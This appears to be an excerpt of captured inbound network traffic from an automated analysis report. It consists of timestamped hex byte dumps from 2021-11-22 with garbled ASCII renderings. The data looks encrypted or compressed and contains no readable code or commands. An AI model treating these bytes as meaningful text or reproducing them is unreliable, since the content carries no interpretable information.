                                                                                            Data Ascii: kL^{vXsI>kmust}[F$z:vRZ^UTqFu1H9vuyR9D\4E/eY{nJjfL&K1V+sIWVK(L"^c:vpCU){\`5A4ar{kk)vO_0;\WK(AKX
                                                                                            2021-11-22 18:40:22 UTC70INData Raw: b1 cc b5 f9 23 d2 e6 6d 82 02 99 f4 3c 0b 75 82 10 df dd 65 20 bc 5e 11 1f 0a ca 9f 2f 6d b7 2a fe da 5b ed 12 df dc 57 7a 27 f1 46 1a 58 73 6a ae c3 a9 de 8a 6e 96 f9 2f 95 ca ac 92 fe 8c b8 a4 a1 1f e3 bb 0d f7 ba b8 12 56 39 00 6a 02 d9 6b 04 61 2c 96 17 20 2d 18 2a 2f a4 02 08 ae 07 2f bc fd f1 fd 04 29 e1 60 be ae e2 9a 72 1c f8 db e6 26 ac f7 1d 80 fb ae 93 3b 49 5e 1a f5 7a 0e 41 c2 0a f8 8c 59 f1 79 24 01 bf 6f 61 b7 f8 9f b5 c1 d2 43 e4 45 ca 50 b2 70 17 b5 bf 93 f4 80 fa 13 c7 65 1f 4f a7 22 01 97 1c 6c 5e 38 10 64 a4 a9 83 fc 56 31 a1 ef 58 48 8b 9e c8 e7 6f 4e ad 1b 2b 83 d9 12 0c ee 4a 7c 56 49 86 b4 be 8d 30 44 1c 46 f8 5e fd 5d 57 d2 ed 70 d1 a2 8d 31 d2 d3 6b 0d 2e b2 f9 8d 73 ed fb bb bc 45 5c 31 1c d9 b8 d3 3e c3 29 37 eb 9a da 81 ca 6f
                                                                                            Data Ascii: #m<ue ^/m*[Wz'FXsjn/V9jka, -*//)`r&;I^zAYy$oaCEPpeO"l^8dV1XHoN+J|VI0DF^]Wp1k.sE\1>)7o
                                                                                            2021-11-22 18:40:22 UTC71INData Raw: 60 f3 2a 0d cb f3 13 8a 1b b3 fd 19 b9 7b 1d 9d 91 e0 23 ab ec 39 34 29 a1 6a 33 d0 35 48 80 fa 0d 69 ba 0d 26 92 7a 3b fa ce 53 7a 25 95 29 ad 76 9f 14 5a 9a f4 5d 82 d3 2e 86 7e db 10 7c ac 77 17 80 ef f1 f8 a3 f7 17 13 e3 5f 42 40 ce 7d 16 00 80 23 3d 3d b3 13 6c 12 b1 78 10 6f f5 9e 82 cf c0 02 de 30 d0 c8 c3 d5 21 ec 49 36 7a 4d da eb f3 a4 ea 46 51 fc 2c f8 02 8b ec 60 71 f9 c8 32 88 e5 3b e0 dc fc 8c 59 b9 9e 30 b6 6a e1 4f 15 78 0b e8 89 ba 34 6d fc eb e7 0d 9a ae e0 40 38 ff 7d 7e 61 57 d9 27 bd 44 6e 62 82 81 ef d8 8b 66 e2 cd 50 25 38 bb e8 45 32 3a 8c c5 ec a7 59 0e 37 a9 89 f2 f9 9f ba 91 db 7b 00 ee 3a c4 89 52 eb c8 3c c2 8d ee 4f 7e d2 4d 01 60 5c 68 ec 65 11 9b fb e1 01 32 0b 99 ea d7 e2 ce 40 d2 34 17 1e fa b8 43 e2 a8 aa 49 5d a6 7e e8
                                                                                            Data Ascii: `*{#94)j35Hi&z;Sz%)vZ].~|w_B@}#==lxo0!I6zMFQ,`q2;Y0jOx4m@8}~aW'DnbfP%8E2:Y7{:R<O~M`\he2@4CI]~
                                                                                            2021-11-22 18:40:22 UTC72INData Raw: cb 02 c4 58 3b fc 92 bb 76 0a 8a 82 c9 c1 45 a0 ef 32 88 f3 92 71 54 91 c2 9f d9 f0 49 75 5a f8 a8 04 cc 67 76 01 41 41 67 3c 37 6f e5 16 05 82 1d 37 55 23 e5 fd 4b be ed 11 e3 0c 0e 3c cb 49 0a a7 8b e5 d0 35 f9 c4 c2 9f 2a 0e 5a f7 4d 08 97 7d b2 ca 42 7e 19 29 73 89 23 52 70 15 da 5b 30 d3 c7 31 f6 1f e5 81 7b 6b 2d 75 d4 f4 fa 36 87 01 96 8c 9c f0 2e 10 05 12 ba dc fc 64 fb ae dc 3f 47 65 af 18 c6 4d 8e c1 02 4d 41 4b c1 75 f7 5c f1 f2 62 01 87 98 76 af 89 b4 b5 18 1f a5 5c 7c 62 1d b4 06 96 3e 48 5f 26 5b 5f 2c 30 9a 23 18 c2 8d e0 66 b4 2e 58 48 06 0e 28 44 7b 01 a9 8e d5 56 0c 5f b6 6c 47 59 e4 00 b4 4d 61 b8 ad a6 c8 31 bf 85 8d 04 7c b7 8d c8 b0 6f 55 d5 4a 46 34 97 bb 0f 72 13 bf e2 0e 56 8f 56 26 36 27 0c 87 5d 2d 2e 45 3e ea d6 87 f5 e9 d9 d9
                                                                                            Data Ascii: X;vE2qTIuZgvAAg<7o7U#K<I5*ZM}B~)s#Rp[01{k-u6.d?GeMMAKu\bv\|b>H_&[_,0#f.XH(D{V_lGYMa1|oUJF4rVV&6']-.E>
                                                                                            2021-11-22 18:40:22 UTC74INData Raw: 72 be 50 d8 df d4 87 b0 4e d3 7b 39 3b fc 26 f4 87 40 22 80 0a a8 c2 aa 38 46 66 21 08 cc 6b 98 19 db ed 8c 87 79 9f ec 01 c1 e6 5d e4 ff 9f 4d 29 1b e6 04 7f a4 e4 69 2d 10 28 21 2b 5c 24 a7 74 ad bd a4 53 fe f2 db 11 86 d8 26 d3 8e 27 f6 46 67 40 0a 7f 55 ae 04 89 0d 4e a6 3d a4 fa a3 c8 cb d9 f8 57 74 84 99 2a 8c a4 a6 c7 fb 8a ad e8 cb 08 47 1d 63 52 ba 82 7a 2c 86 12 36 6c a5 13 da 10 44 dd 15 1d e4 54 24 b1 81 b8 97 19 2b 86 e5 fd a0 67 f2 52 71 69 58 cb fa 00 c1 5b 65 b8 64 57 52 2a c9 c1 7f 65 9b 15 06 f2 31 4b af 7e 06 0a f3 2a c0 1f 2c 2d c7 68 27 7a ea b9 e1 07 70 f5 3a 14 a5 c9 5d f3 8c 9b 2d e9 47 c6 55 5a 1d b7 a3 f6 ad 64 16 be e6 06 81 4a b9 e8 4b 9c 9d 49 f1 8c 73 a6 b5 51 b5 e4 d6 13 bb 28 4f 81 41 8a 23 8f 4b c8 33 58 ba 43 e8 e7 e0 f8
                                                                                            Data Ascii: rPN{9;&@"8Ff!ky]M)i-(!+\$tS&'Fg@UN=Wt*GcRz,6lDT$+gRqiX[edWR*e1K~*,-h'zp:]-GUZdJKIsQ(OA#K3XC
                                                                                            2021-11-22 18:40:22 UTC75INData Raw: 4e 77 43 8d c3 2a f2 d4 01 9f d4 10 90 79 ed 85 28 9f c7 f7 31 7c 4e f8 a3 72 a8 46 77 d4 d7 2c 64 27 85 8b 9f d6 be 59 06 3f dc 03 02 2f de d8 9b 16 f5 34 b4 d7 af bd e5 12 c9 91 7a a1 a1 a2 ae 18 41 10 54 96 b9 c2 fc 21 8a 48 2f 02 1b 69 d5 52 b6 c1 33 2a 7c 6f 0b 3b 4d 90 5b d2 3d c9 eb 69 e5 3e fe 33 76 78 9e 2c f4 cb 92 cc cc 4f 6e a4 81 7b e1 8e c3 8f 02 c7 c1 b4 9d 94 15 36 4f eb d1 71 1c b3 42 55 32 27 28 5e 2c 66 3e 06 04 86 81 40 94 37 a0 12 92 0c 8c 9c e6 e1 78 8d dd 92 6b ee e2 08 76 71 9d 9e f4 c3 f8 22 f6 b1 04 e0 bd 3e 97 2b 88 57 42 6a c9 26 1c a2 21 38 c6 1c 49 cd 5f 65 15 68 2c fe c1 dd c4 a1 65 f8 29 a5 87 f7 58 0f 8b c1 85 bc 1b 9b 11 c3 b8 42 ac be 4f 56 77 eb 83 1c b1 e7 3b 40 46 61 4f 01 33 25 f2 44 38 54 f6 0e 82 56 86 d4 c8 04 5d
                                                                                            Data Ascii: NwC*y(1|NrFw,d'Y?/4zAT!H/iR3*|o;M[=i>3vx,On{6OqBU2'(^,f>@7xkvq">+WBj&!8I_eh,e)XBOVw;@FaO3%D8TV]
                                                                                            2021-11-22 18:40:22 UTC76INData Raw: d4 bb 6a 59 be 60 f0 46 2d 98 a4 b2 4e d0 53 a1 a3 59 6c 53 58 6a 53 70 53 f5 72 f0 56 64 e6 b7 05 19 2c 6e ee de 2f d7 59 7e a0 69 1f 2d 7d 27 03 34 43 70 84 21 11 e8 a9 11 70 f3 91 3b 0a c4 d8 68 6b 0d a1 47 0d a0 42 2c 2f 40 35 fd 1c ee ad 29 7f ac 42 5b 62 4e 79 42 a7 40 52 f7 17 39 ce 41 c7 85 86 60 99 67 c1 57 6d 8d 92 00 93 ea ec ee 99 d5 39 20 2d ca a8 72 68 e8 4e c8 41 0e a8 c4 b4 34 45 06 0f 5b be a4 7c 98 36 43 f9 27 fd 56 4a 5d f2 0f 35 cc 90 0d 5f d3 57 b1 dd e1 ae fb 6f 8c 66 b5 47 90 f1 7e e8 89 72 ed cf fd cf c0 1f 65 56 b5 cf e0 62 d2 a1 b8 07 2e 27 f7 e3 d8 7d 4b c7 7a 26 79 6e c0 3d fb e8 31 13 35 43 ce 5f 23 b3 ae b4 a5 73 38 35 82 0b cf 9b 06 64 22 d5 15 05 37 72 ca 0d b5 93 09 a0 06 af cc d2 9f 3e 28 4e 2e 1c e2 bf 6f 98 93 b7 74 36
                                                                                            Data Ascii: jY`F-NSYlSXjSpSrVd,n/Y~i-}'4Cp!p;hkGB,/@5)B[bNyB@R9A`gWm9 -rhNA4E[|6C'VJ]5_WofG~reVb.'}Kz&yn=15C_#s85d"7r>(N.ot6
                                                                                            2021-11-22 18:40:22 UTC77INData Raw: a2 5f ec d6 eb df 59 ac b8 0e a3 a6 1e 0a ad 02 72 84 4b 82 5f 7f 85 31 9d 05 2c 77 ee 75 00 8b cd fa 2c 0e 3f 57 ef 77 0f 4f 3b 0b dd 08 35 14 ca 3b f4 ea 83 56 04 df 04 a6 15 57 5b 70 91 14 33 1d 54 97 a8 91 97 f9 05 a1 be a7 e7 be 10 54 62 b9 07 f7 21 8a 13 1e 15 2f 95 b0 39 81 d6 38 70 0e d5 a3 3f 77 70 e3 87 3f a8 55 e2 25 7b ea 0c 5f 91 9e bb a0 d9 9e 38 a9 17 66 4c 57 fb 53 8d 7b 02 72 24 d6 98 5e e2 9f 41 ea 15 07 37 d7 12 74 fe 47 33 85 dd 4d 7f 65 b8 d6 c9 4d 64 49 ff 43 55 2a 86 77 8b 5b 85 cb 7a be 4c 53 9c 48 92 f5 dd ae 59 be 6f ea 4a f7 b1 8f 68 bd b4 77 d7 ff fd 11 b1 dd 51 ca 31 7d ef 0c e3 79 32 79 a7 ed 5c d8 f2 74 51 f7 59 38 7c c8 2e f1 c3 93 2b d9 7f 02 fa 10 ba 0d 36 47 3e 08 7e b0 c5 39 fb 00 a0 61 5a 9a 07 b2 ea d0 07 b1 9b 9d b9
                                                                                            Data Ascii: _YrK_1,wu,?WwO;5;VW[p3TTb!/98p?wp?U%{_8fLWS{r$^A7tG3MeMdICU*w[zLSHYoJhwQ1}y2y\tQY8|.+6G>~9aZ
                                                                                            2021-11-22 18:40:22 UTC79INData Raw: f3 c0 b9 77 7b 25 84 1a 4b 0d 58 e3 64 aa 24 f9 82 37 c9 3b c8 c9 f2 db 6e 53 5f 62 79 fa f8 a6 18 8f 43 54 87 c8 8f c2 3e 3d a2 02 9e cd 5b 01 9f 91 e0 2b ee 20 ee a1 d2 90 bf d7 69 bc 55 87 7c 34 e4 f7 f9 76 75 eb 7c 60 cd 53 05 3d b5 80 eb 13 a1 e4 9c 2b 0c 53 7a 97 c1 0d 88 4c 65 88 53 62 4b 0d 79 99 bb c2 33 e1 c0 69 72 6d 76 f2 78 62 3a 5a e9 0c f7 82 52 5f 60 ab ec 11 8b 48 76 2d 09 97 6a 85 49 8a 08 cb db 63 1a 26 76 c4 58 df 1c 0a 53 d6 ec 8d 78 4f b5 67 dd eb f5 af 25 51 dd 6f 58 2b 6d 59 44 3a 95 86 43 b2 bc 71 eb 3c af 7b d0 95 41 e3 dc 75 16 60 fe 4c 8a 23 a5 cc d9 30 7a fe f3 d0 67 d8 b4 30 bd 54 3b 03 ba 05 98 f0 5e a5 47 16 43 a9 9b ec 44 5a c8 3c d8 4b 80 84 d2 6c cf 3a 8e cc d4 ce 55 81 02 86 35 41 0a 12 83 20 f6 23 16 96 32 0b ea ac 16
                                                                                            Data Ascii: w{%KXd$7;nS_byCT>=[+ iU|4vu|`S=+SzLeSbKy3irmvxb:ZR_`Hv-jIc&vXSxOg%QoX+mYD:Cq<{Au`L#0zg0T;^GCDZ<Kl:U5A #2
                                                                                            2021-11-22 18:40:22 UTC80INData Raw: c5 da 94 dc af 89 61 e0 9c 59 20 cb ff 72 d4 81 df 8f b8 aa 7c c8 5e 1f 60 ad 0f 67 f1 8d 8d 83 58 c6 0f f2 8e 81 07 22 38 8d c2 ff f4 e5 39 65 57 05 2b f6 c0 d3 2e 89 7c 09 c4 4e f0 49 75 5a f8 aa 01 11 c1 2f de 9d ba 4a b7 57 e2 bb 1a ed c9 4b be 10 b5 6c 5f e7 54 3b 69 2b 51 79 96 22 fe a3 6b c9 91 96 fb fe 81 c8 1d f3 fd 35 b4 fa 03 92 7d 49 b8 12 52 39 02 33 50 88 94 7b 59 a2 e5 46 80 66 af 99 35 6d 42 a5 27 9e 7a dc 6b 6f c1 f2 5c 96 ba 41 5e f5 28 55 1d 12 b8 60 ee e9 38 84 45 e9 13 44 e5 8f ba 10 df eb fb 3c 3e 0d 79 7e 94 0a b8 34 6d 24 1b 8c 3c 3f aa eb ca 90 72 e4 7d e1 a3 3a 63 be bd 8a 14 3f 09 87 2e 4d b4 9d 70 f1 72 6b a4 31 f2 fa 08 b9 25 c0 d3 84 88 ef d6 af e0 7c b1 f2 0e db be a5 89 79 8d 0a 84 ba 2c 30 e1 48 cb b2 4f d1 b8 3b c8 84 3e
                                                                                            Data Ascii: aY r|^`gX"89eW+.|NIuZ/JWKl_T;i+Qy"k5}IR93P{YFf5mB'zko\A^(U`8ED<>y~4m$<?r}:c?.Mprk1%|y,0HO;>
                                                                                            2021-11-22 18:40:22 UTC81INData Raw: b3 4d f6 f4 c8 59 5f 37 f1 21 5a 99 72 b2 c9 d7 8e 85 f0 a8 b4 f1 b0 d5 d8 5e ca 38 3c bd 9c 70 fe 57 c4 6f 2f 1b a0 3c 0e 45 5a 6a f5 93 ab 7a 37 0c 83 c4 64 76 46 4b 46 6e 22 12 87 b0 4e 4c 4e e7 a1 ae 3c eb fb 65 48 6f 50 f0 b4 b5 2d 06 89 75 2b 30 df bf e1 8b d5 1f 94 53 0c 37 d3 ba ae 00 53 b2 df c6 57 8b da 9a d0 de 2f ff 1a 42 08 35 9c f9 ac bd 04 42 a7 76 f2 a5 d8 18 81 51 65 7d 2b 82 90 61 03 ec 95 8c 48 76 5f 92 30 ea 52 14 35 f7 64 80 a5 d7 5e c5 7c a6 ad 12 ff 54 c1 4d ff ef 50 9f 53 25 03 1e 7d 72 39 93 44 5c e3 6d 99 44 85 e3 04 ab 8a 2f 25 49 c2 50 84 d2 10 0c ef 19 56 60 e2 5c c5 e7 f1 2c e1 7d ce 38 f2 35 33 26 8f b4 30 bd 18 39 03 ba de 22 01 5e 58 4b f6 26 83 9f 42 44 27 c4 c4 d8 4b 5d 36 27 c8 21 81 70 64 7c d1 b7 5b d0 12 c9 be f5 3a
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                                                                                            2021-11-22 18:40:22 UTC82INData Raw: 6c 95 18 cd 0b c6 ff 7d 6c 39 29 6c aa 48 8a 76 1c 44 a4 c2 86 b9 e4 b1 bb c0 f9 3c 89 64 ad 87 ad 9f 8a a6 98 d4 90 dd b8 1c 6f e2 01 f8 e8 63 a1 75 9f 15 49 ae ee 9b ba df 5a 5c 5c b7 cf bb bd 00 e2 52 cd c2 49 4a 8d be 40 3c fb ef 7c 34 5f 8f 37 c6 af 2d af 3d 06 1d 47 1a 8e 14 68 74 44 8d 90 5a 3a f0 44 92 d7 bd 14 22 ff 43 c8 72 78 49 03 bd eb a9 68 62 d8 13 bf 3a 25 71 81 73 89 e9 cf 67 c1 0f 4b a8 0c 43 dd 0c 86 89 59 ba ee 85 9c a5 eb 6f cb 6c d3 9a 6d f7 dd 83 71 9b 94 66 a1 cc 38 10 de e8 61 df 8d 6b 1d e1 2c b7 7a 7d 47 59 1e 47 23 4b 1f 15 f3 f9 64 03 72 fd 49 46 04 15 bb ba e3 cc 6f 67 6c a6 d2 ed 3f 06 69 bc 6f 78 21 ac 69 ba 4d 26 92 5e ac 03 94 ed 6f 6b 1a 7d 79 83 1e 1b 49 10 15 d2 8d 6e 2e 7f 32 80 35 0d d6 2e e4 0d 51 a1 f8 a3 22 b1 1d
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                                                                                            2021-11-22 18:40:22 UTC83INData Raw: ed 18 84 59 0c 3c 8f 81 90 06 c8 8c ba 28 50 dd 85 d7 0e 2f e4 bd 97 e8 b5 34 ab 09 20 a5 66 34 97 8d 70 93 ac 36 04 cf ad 52 05 eb f1 79 ec 65 58 da 69 46 93 a3 e0 62 c4 13 c0 24 b2 77 42 69 cd e5 5c 32 5a 1e 27 60 95 c5 35 ed 59 6c 9b ef ca f2 48 7d ba 89 5f 8e 22 07 ef 21 c6 0f 67 c2 b1 ac 96 65 2b 55 a2 09 d6 9f cc d2 f2 09 7e 7d 7b 7a 5a 6d 1a 8e 3b ed be e2 5e 40 62 e9 76 d1 1d 67 d8 00 3b a5 ac a3 d0 49 a5 ec 4f 0c fe d4 db 4a be 91 5d 9f 3d 75 62 f0 6f 9c e9 eb a1 20 1b 48 2b 14 54 94 ab 3c 01 4d 1f f7 51 b0 7d d5 87 cf 62 80 13 6a a6 86 9f da fd a8 b3 48 0a 03 b3 2c b7 76 74 f8 18 9f 7e 2c fa d3 40 40 d2 7c b8 44 ee 3f f4 1b ba 69 8d ba 25 9d 7c ce cb d3 f2 20 ee 66 57 97 4f 41 c4 a2 76 48 c8 e6 fd 82 3a 06 3d 21 fe 3e 0e 00 23 9d b4 32 8d b7 92
                                                                                            Data Ascii: Y<(P/4 f4p6RyeXiFb$wBi\2Z'`5YlH}_"!ge+U~}{zZm;^@bvg;IOJ]=ubo H+T<MQ}bjH,vt~,@@|D?i%| fWOAvH:=!>#2
                                                                                            2021-11-22 18:40:22 UTC84INData Raw: 0a 37 a8 dd 57 bf c6 93 c4 6b 38 c5 8b 51 33 a3 c4 cf 7d 0f d8 83 ee a5 40 9a 00 88 e2 2e ff fe f9 53 e7 83 e8 e0 ae 77 64 f9 c8 ec fe 42 9f fd 78 ee 34 2e d3 1b 1c 01 e8 ec 61 44 98 12 bc 76 05 ef 74 59 5a 0b 98 95 35 06 68 54 ea 1b 27 33 c3 3b 57 71 dd 3c c3 88 45 0f 91 3c 65 fa e4 69 8f da 77 7a 4f cb 57 7a 71 38 7e ea 1a 74 49 f3 b1 2e 1e c9 21 ec 11 46 bd c8 5a 86 f0 7e bd de 5a 13 4e b0 17 be b1 24 49 9f bc d4 6f 71 12 51 12 12 b9 00 37 8d f8 9f 90 fe 76 6b 86 15 ae 9f 37 16 de 7a 7e 11 47 ae f9 6d 1c cd d8 f2 11 9d 6e fe 92 67 9f 22 4d d1 ac 5f 1a 5d 06 04 d2 6a f5 04 20 bc 3b 81 93 46 94 0d 02 ec 14 3e b4 48 75 5e 96 1d d9 19 d3 50 7c 42 d3 8d 19 8e 70 55 0d f4 74 b4 8e 10 23 3a 70 cd 27 9f b8 13 1c c4 78 12 ef f7 b4 fe 21 00 a4 f6 77 ac 50 3e 0b
                                                                                            Data Ascii: 7Wk8Q3}@.SwdBx4.aDvtYZ5hT'3;Wq<E<eiwzOWzq8~tI.!FZ~ZN$IoqQ7vk7z~Gmng"M_]j ;F>Hu^P|BpUt#:p'x!wP>
                                                                                            2021-11-22 18:40:22 UTC86INData Raw: 79 2a 3b 05 20 07 4b 22 5c 57 aa 47 a1 da 68 0c 5d bc 85 c7 9b 3e f0 dd 53 df fa b6 2f 2f 9a ec 5c 54 ef 67 21 65 84 68 f7 66 0d 28 87 ed 59 d6 5e fc 54 73 53 d1 d4 d4 40 0d 13 35 01 15 dd a5 28 6c 29 b1 48 6e ff 72 16 65 51 46 ab af b5 a0 aa 8d 67 09 c1 ca 30 1c 2d b4 7c 8f 54 e4 9c 55 51 92 87 26 3c 3f f0 54 07 96 bb fa e2 b2 e0 61 44 73 82 ec bb e3 8d 68 43 8a 92 7e 69 89 6d 44 4d 3a ed b8 d1 ba 25 e8 c5 d9 a3 dd c5 63 ec 33 82 62 b4 3c c5 6f ec d1 b0 65 a9 34 eb 1f 03 d4 d2 b0 16 43 83 7d ab 62 a6 55 9b 2a 02 be eb 54 00 b8 aa 14 ca 5e 1f 87 de 9a 7c 65 98 2d 93 08 ff 58 67 9b 05 b7 16 79 08 fd 9f 8e b7 7f 33 23 1e a2 4d 8e 57 fa d6 f7 ca 14 86 be 67 e2 e1 c1 5b 27 06 96 14 25 06 f3 76 cd f6 ed 2f 69 ec 99 1c bc 54 18 18 fe 1c cc e8 39 ef a7 86 c9 55
                                                                                            Data Ascii: y*; K"\WGh]>S//\Tg!ehf(Y^TsS@5(l)HnreQFg0-|TUQ&<?TaDshC~imDM:%c3b<oe4C}bU*T^|e-Xgy3#MWg['%v/iT9U
                                                                                            2021-11-22 18:40:22 UTC87INData Raw: 86 a6 a1 0a 0d a0 65 cc 93 f6 62 f4 45 60 74 ce 92 b3 88 a4 1f e9 4a 75 c4 b9 b1 45 39 c4 88 a6 49 8b bd 57 4b 76 0a 8d c0 ce 86 01 5f f7 6e e1 e1 e9 26 73 e9 8a 5f ed 98 08 79 3f 91 68 ec cb 90 48 07 51 99 df 68 34 67 fd fd 11 18 37 84 40 74 0d d1 63 86 ee 18 e2 92 f1 ce 6d f6 84 b7 52 99 7f e7 ef 08 20 d7 ec 31 0c e3 31 dc 87 75 00 c2 bf 37 f2 82 71 45 07 f0 dd 4d e6 bb 0a f6 38 bd 67 f8 c8 3f 06 fd ea 71 2d cf 24 d6 9d e6 9e fb 32 da 34 37 6a d4 6f 30 67 ad 43 ed 62 d4 ea 45 8d 4b 33 a6 c8 3c 29 88 27 aa c1 b9 77 a6 f7 c7 f8 dc 83 4e b3 da 48 1f bf 8a 43 0b b0 e9 60 72 b6 15 10 2f a0 4e 08 7d be c5 5c 04 74 f3 02 f4 77 73 6b 7f 78 f5 bd 91 ee 85 38 47 e7 6b c8 e6 88 a0 7d 5b 81 d7 43 55 10 aa 58 e4 ff 06 a1 90 9a 63 ce 32 21 ea 81 12 97 52 a3 a0 cd 2c
                                                                                            Data Ascii: ebE`tJuE9IWKv_n&s_y?hHQh4g7@tcmR 11u7qEM8g?q-$247jo0gCbEK3<)'wNHC`r/N}\twskx8Gk}[CUXc2!R,
                                                                                            2021-11-22 18:40:22 UTC88INData Raw: e3 8e 01 00 33 0b c9 31 6c f6 92 12 5f b8 b3 c9 eb 84 33 4b 00 d8 fa 5a 39 ae f1 69 04 e0 9f 67 dc 0d 56 10 80 ed 65 30 e4 87 4c 54 56 bd b1 f8 83 98 6a a1 ed ac 2c 5f c9 71 00 68 9d d2 8a 13 80 43 e8 12 c7 5d 8c b6 ce 44 6e 5c 65 f2 4f 0c 81 dd 3b 9f 48 e8 49 c1 ab 32 69 de d4 13 1d b4 47 21 14 9d 96 40 6e 6e d8 9c d7 33 93 87 28 8a 1e 6c a5 37 ec f7 8e 53 15 9d a2 45 7d e1 95 30 e3 22 8b cf 1c 3a 2b d8 5e bc d7 b1 b4 66 3a 77 d1 77 d0 e2 a4 a4 51 fe 56 ec 2c a2 63 b4 8c e7 7f 67 b0 c1 fe 62 ad 4b be f8 4c f6 49 9d af 02 e4 3a 9d d2 71 b0 f1 d9 f0 67 df d9 47 40 10 9d 4b e0 7e 89 d2 c2 df cb 75 2d 31 c9 7d 45 ef 56 fa e7 1c a0 02 8a f6 4d 62 17 80 40 aa c8 a5 f7 99 cd 17 34 60 d6 be 58 da 9a f9 76 16 63 be 15 57 5a 5c 41 a0 80 2b 54 e5 66 d5 38 17 bd e0
                                                                                            Data Ascii: 31l_3KZ9igVe0LTVj,_qhC]Dn\eO;HI2iG!@nn3(l7SE}0":+^f:wwQV,cgbKLI:qgG@K~u-1}EVMb@4`XvcWZ\A+Tf8
                                                                                            2021-11-22 18:40:22 UTC90INData Raw: 58 db 0a 99 46 b3 72 04 b3 cb fe 79 ec e1 4e c0 78 2e c9 7b e2 86 e3 ae ec 31 de 49 03 db 31 a2 9f 0f de c3 b9 ba 45 3f 8d be 14 cb e5 50 e0 8a d8 1e 0f f7 3d f3 7e ab f3 76 7d 95 07 44 4e d0 bc 00 0a 5a 03 f2 c7 8c 3d 21 51 76 1d 8c bd e7 06 30 a5 32 fd b1 51 3c f9 87 17 fe 1d 5c 3a 6b a8 55 ea 1b 27 0f 6e 58 52 75 dd 24 33 8e 5e ff f4 83 5d c1 25 26 d7 09 b7 af a6 cb 05 85 89 89 37 42 ee ad ee 5a 5b 90 e1 65 e8 00 fb 52 bd 0c cb 05 b2 0c a5 17 55 97 62 85 17 23 6f 25 e6 d2 0b 08 3a 8e 66 a9 43 ed 00 8e bc c8 08 7c f5 b9 ab 3e 79 eb 0f ec b4 08 29 a6 76 6c 34 e2 0a 1c c8 fd 76 4a 40 27 37 43 98 21 fd ee 6e 90 44 75 8b 4f 74 18 46 09 5f fb 98 3e 3f 7e 5e cd 5e 16 61 1c 46 a9 14 19 4c b5 a6 6a 98 19 5e c6 b8 6c 4b ec 20 50 78 21 09 1c 74 b7 7e 75 6a d3 b4
                                                                                            Data Ascii: XFryNx.{1I1E?P=~v}DNZ=!Qv02Q<\:kU'nXRu$3^]%&7BZ[eRUb#o%:fC|>y)vl4vJ@'7C!nDuOtF_>?~^^aFLj^lK Px!t~uj
                                                                                            2021-11-22 18:40:22 UTC91INData Raw: 1a f3 76 64 39 73 87 97 13 e8 5c 67 aa 89 00 33 0b 99 bc 28 d2 a6 42 d2 34 97 e1 ef 84 33 a3 a8 21 04 a5 51 a6 f3 69 04 6d 1b 43 c0 0f 56 10 d3 bd 8d d7 5d 79 b3 d7 92 b1 3c 7c a7 80 68 a1 ed fc 7f 0c a3 6d 53 97 88 52 f8 52 80 2b 84 64 86 5d 01 32 ea 58 6c 5c 65 a2 b0 19 91 af 7a 9f 1b 65 cd e5 b7 30 69 de 84 ec 08 90 35 60 14 a4 ca 64 02 1a f8 74 ba 89 6c 78 ab 72 1f 18 b3 df 68 44 71 ac 96 65 a8 30 7a 09 ed ea 1c dd 60 ca f4 b6 f3 27 a1 85 8b 95 c4 12 35 9f 96 cd 2f 1d 27 5c 50 8b 53 04 8c 5a 9c 4b b5 bb 5b 13 c4 c4 16 e8 34 b4 41 c1 d0 d2 e5 9d af 02 91 63 62 a6 55 c8 7c 55 d4 eb df d9 47 bf 64 b9 1f 1f 0a ad 82 2a 0d 04 8a d2 08 95 59 0d 9b 6d 77 63 38 08 02 8a f6 c4 3e 33 a8 10 27 84 81 d3 71 d7 f7 ca 9f 87 33 1c fe b6 a9 fb 52 47 96 45 da 16 78 79
                                                                                            Data Ascii: vd9s\g3(B43!QimCV]y<|hmSRR+d]2Xl\eze0i5`dtlxrhDqe0z`'5/'\PSZK[4AcbU|UGd*Ymwc8>3'q3RGExy
                                                                                            2021-11-22 18:40:22 UTC92INData Raw: da 02 09 f0 30 0b 17 42 b8 f7 dd 29 5c 55 49 57 1e 1d 31 4b 19 73 84 d4 65 a0 4f f1 51 bb b4 f3 0e 47 ba 47 31 95 ec 1a 59 90 c2 d6 ef da ea 23 5a eb b2 49 cb 99 82 b3 d5 6d 57 55 8a 7d 6a d3 0e c7 12 4d eb 63 bb cb ee 47 78 d6 2d 90 08 47 51 82 ca 9f 2e e1 d0 da 0b 1b 0a ef 53 4b a8 ec fe 19 10 ce d2 5c d1 39 5d 42 07 1f d4 99 d4 bd ba df c4 ad 75 1d 5f ef e4 57 8e 7b b6 b0 34 f5 f3 85 22 78 fe 4d ca 56 0f 5a d1 ca 46 9a 28 ff 12 cd 44 df d5 ff 74 47 73 1b 9b c9 f1 55 5e 29 b7 29 97 5d ff a1 36 1a a9 9b 2d 07 b6 7a 5f 76 04 3a ed 29 43 64 35 f7 f3 55 2a 06 1a 4d 94 16 8e 43 11 85 61 95 62 59 9f 9d 9e 08 01 15 73 50 db 01 36 ac d7 97 fa 1b 57 9e 4a 9b 3a 37 6b b7 10 de fb b3 22 28 8f 02 f7 b5 ab 5e 5a ae 5a 59 67 fa 5a d9 76 ef 64 28 b4 c4 d2 3f 43 ed d4
                                                                                            Data Ascii: 0B)\UIW1KseOQGG1Y#ZImWU}jMcGx-GQ.SK\9]Bu_W{4"xMVZF(DtGsU^))]6-z_v:)Cd5U*MCabYsP6WJ:7k"(^ZZYgZvd(?C
                                                                                            2021-11-22 18:40:22 UTC93INData Raw: bb 66 04 58 61 d9 e6 10 2e 5a af 4f be fa c6 9a ec 1f f2 51 87 24 26 aa c8 73 40 6e eb c8 28 d2 e7 2c f2 55 e4 92 8a f6 47 ca c7 4f 24 c6 3e c8 97 00 70 04 74 2d e0 69 37 79 bf d8 e9 d7 5d 79 e3 a2 e0 d4 7f 1d cb ec 68 a1 ed fc 7f 0c a3 6d 12 b7 f8 27 8a 37 a0 5d ed 16 f2 28 60 5e ca 3e 19 32 06 d6 d9 76 ff 8f 0d fe 68 45 ae 84 db 5c 0c ba aa cc 5c f8 5c 13 34 cd b9 44 63 3a 9e 15 ce e8 00 58 ce 00 6d 77 c1 f3 48 25 1f c8 b6 0c c6 54 13 6a 8c 9e 79 ae 40 ab d4 c5 96 55 c8 ea fe e6 e4 77 47 ed f9 bf 0f 74 49 7c 24 e3 36 24 e5 37 ec 27 d0 d6 3e 7d b0 a5 62 81 5b da 61 ae b6 f2 91 f5 ca 22 f0 13 12 ca 3c ab 1d 21 bd 84 b1 d9 47 bf 3c e1 47 47 52 f5 82 2a 49 61 e8 a7 6f 95 59 0d d2 03 1d 06 5b 7c 6b e4 91 f2 0a 33 f4 